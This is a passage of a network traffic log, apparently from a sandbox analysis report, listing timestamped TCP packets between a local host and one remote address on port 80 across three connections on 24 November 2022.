Nov 24, 2022 12:19:59.899883032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899923086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899928093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899971008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900013924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900015116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900060892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900105000 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900105953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900161982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900206089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900250912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900252104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900298119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900341034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900343895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900382042 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900383949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900428057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900470972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900470972 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900509119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900551081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900553942 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900598049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900641918 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900641918 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900686979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900729895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900731087 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900774002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900816917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900859118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900907993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900916100 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900938034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.900942087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.900975943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901006937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901017904 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901041031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901046991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901072979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901106119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901127100 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901139021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901175976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901210070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901225090 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901245117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901278019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901309967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901313066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901326895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901344061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901377916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901408911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901417017 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901442051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901446104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901475906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901509047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901515007 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901542902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901576042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901582003 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901609898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901659966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901694059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901706934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901726961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901736975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901760101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901792049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901798010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901825905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901858091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901865005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901891947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901923895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901954889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.901959896 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.901988029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902019978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902026892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902053118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902061939 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902086973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902122974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902132034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902156115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902189016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902198076 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902224064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902256012 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902288914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902297974 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902323008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902357101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902365923 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902393103 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902426004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902434111 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902461052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902467012 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902496099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902529955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902540922 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902563095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902595997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902606964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902631998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902667046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902699947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902713060 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902734995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902769089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902780056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902802944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902808905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902837992 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902873039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902895927 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902925014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902961016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.902976036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.902997017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903029919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903063059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903073072 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.903096914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903131008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903139114 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.903163910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903170109 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.903198004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903233051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903240919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.903268099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903296947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.903315067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.976352930 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.029716015 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.047449112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.047610044 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.156673908 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.173636913 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.173783064 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.179210901 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.196224928 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279588938 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279630899 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279655933 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279683113 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279704094 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.279709101 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279735088 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279758930 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.279761076 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279779911 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.279788017 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279815912 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279841900 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279865980 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.279866934 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279895067 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.279906988 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.279953957 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.280265093 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.280294895 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.280322075 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.280349970 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.280360937 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.280421972 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.281037092 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281075001 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281101942 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281128883 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281151056 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.281208992 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.281832933 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281861067 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281888962 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281915903 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.281966925 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.281966925 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.282640934 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.282669067 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.282696009 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.282722950 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.282738924 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.282774925 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.283428907 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.283457994 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.283531904 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.303908110 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.303942919 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.303966999 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.303992033 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.303999901 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.304039955 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.304220915 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.304248095 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.304272890 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.304296970 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.304368973 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.305048943 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305085897 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305119991 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305130005 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.305155039 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305206060 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.305836916 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305865049 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305888891 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305912971 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.305923939 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.305953979 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.306621075 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.306647062 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.306670904 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.306727886 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.307246923 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.307272911 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.307296038 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.307310104 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.307322979 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.307375908 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.308083057 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308135033 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308168888 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308188915 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.308199883 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308213949 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.308825970 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308859110 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308890104 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.308893919 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308927059 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.308968067 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.309644938 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.309685946 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.309705019 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.309716940 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.309747934 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.309793949 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.310615063 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.310664892 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.310689926 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.310694933 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.310725927 CET	80	49709	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.310734987 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.382862091 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.958385944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.975492954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:02.975663900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.976017952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:02.993001938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197792053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197837114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197890043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197916031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197942019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197968006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.197987080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.197993040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198018074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198043108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.198045969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198060989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.198074102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198098898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198122025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198134899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.198163986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.198455095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198479891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198506117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198529959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.198529959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.198570967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.199316025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.199346066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.199368000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.199388027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.199414968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.199487925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.200076103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200100899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200120926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200139999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200161934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.200221062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.200932980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200956106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200974941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.200993061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.201056004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.201688051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.201708078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.201788902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.215007067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215053082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215082884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215111971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215183973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.215270042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.215323925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215354919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215383053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215405941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.215408087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.215445995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.216136932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.216170073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.216196060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.216222048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.216233969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.216262102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.216989040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217020035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217046976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217072010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217087984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.217145920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.217756987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217788935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217812061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.217858076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.218350887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.218384981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.218437910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.218466043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219012022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.219202995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219233990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219259977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219284058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.219286919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219306946 CET	49710	80	192.168.2.3	66.235.200.147
